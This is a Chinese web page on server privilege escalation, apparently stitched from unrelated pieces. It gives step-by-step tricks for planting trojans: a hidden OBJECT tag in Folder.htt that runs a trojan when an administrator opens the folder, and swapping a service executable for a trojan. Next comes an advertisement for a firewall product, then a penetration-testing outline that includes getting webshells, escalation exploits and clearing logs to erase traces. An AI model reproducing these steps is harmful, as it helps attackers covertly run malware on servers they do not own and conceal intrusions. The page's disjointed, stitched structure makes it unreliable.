怎么服务器提权啊

要的就是vnc是可以反向连接的，这个方法我没有试过，只是曾经看影子做过一个视频动画。 9.desktop.ini与Folder.htt方法。（此方法是在网络看到的）方法如下：首先建立一个文件夹，进入，在空白处点右键，选择“自定义文件夹”一直下点，默认即可。完成后，你就会看到在此目录下多了两个名为Foldersetting的文件架与desktop.ini的文件，如果看不到，就把显示所有文件给选上，然后我们在Folder setting目录下找到Folder.htt文件，记事本打开，在任意地方加入以下代码：<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木马名”></OBJECT>然后你将你的木马文件放在Folder setting目录下，把此目录与desktop.ini一起上传到对方任意一个目录下，就可以了，只要等管理员浏览了此目录，它就执行了我们的木马，此方法也属于类似autorun的守株待兔方法。 10.替换服务提权：我认为比较复杂，不过有些时候也实用，首先是看服务进程，在看我们是否有执行命令的权限，这里要用到的命令是rename，相关用法： C:\>rename /? 重命名文件。 RENAME [drive:][path]filename1 filename2. REN [drive:][path]filename1 filename2. 例如替换c:\kv2004\kv.exe的进程 rename c:\kv2004\kv.exe bear.exe然后再将我们的本地木马文件命名为kv.exe上传到c:\kv2004\目录下，等待对方重新起动机算机即可

为了安全，最好重装系统。装好后打好补丁，再装个服务器入侵防御系统，基本上可以保证服务器安全了。

风云防火墙服务器入侵防护系统功能介绍：（外防 内保）

防御DDOS攻击功能：

1.SYN Flood CC 类攻击，快速设置端口过滤规则,流量统计

2.ARP保护功能，防止数据被嗅探和被修改挂马

服务器入侵防护功能：

3.SQL防注入功能保护服务器所有网站免受入侵烦恼

4.进程保护模式可使木马和病毒拒之门外

5.文件保护模式可使网站文件不被篡改

6.注册表保护模式保护不让安装服务启动和驱动项目

7.系统用户名监控防止黑客新建用户名

8.手机短信通知功能能让你了解服务器安全状态

使用最佳状况表现：打造出一台安全省心免维护的服务器。

1.信息收集：

1)、获取域名的whois信息,获取注册者邮箱姓名电话等。

2)、查询服务器旁站以及子域名站点，因为主站一般比较难，所以先看看旁站有没有通用性的cms或者其他漏洞。

3)、查看服务器操作系统版本，web中间件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞。

4)、查看IP，进行IP地址端口扫描，对响应的端口进行漏洞探测，比如 rsync,心脏出血，mysql,ftp,ssh弱口令等。

5)、扫描网站目录结构，看看是否可以遍历目录，或者敏感文件泄漏，比如php探针。

6)、google hack 进一步探测网站的信息，后台，敏感文件。

2.漏洞扫描：

开始检测漏洞，如XSS,XSRF,sql注入，代码执行，命令执行，越权访问，目录读取，任意文件读取，下载，文件包含， 远程命令执行，弱口令，上传，编辑器漏洞，暴力破解等。

3.漏洞利用：

利用以上的方式拿到webshell，或者其他权限。

4.权限提升：

提权服务器，比如windows下mysql的udf提权，serv-u提权，windows低版本的漏洞，如iis6,pr,巴西烤肉， linux藏牛漏洞，linux内核版本漏洞提权，linux下的mysql system提权以及oracle低权限提权。

5.日志清理：

结束渗透测试工作需要做的事情，抹除自己的痕迹。

需要规避的风险：

1. 不执行任何可能引起业务中断的攻击（包括资源耗竭型DoS，畸形报文攻击，数据破坏）。

2. 测试验证时间放在业务量最小的时间进行。

3. 测试执行前确保相关数据进行备份

4. 所有测试在执行前和维护人员进行沟通确认。

---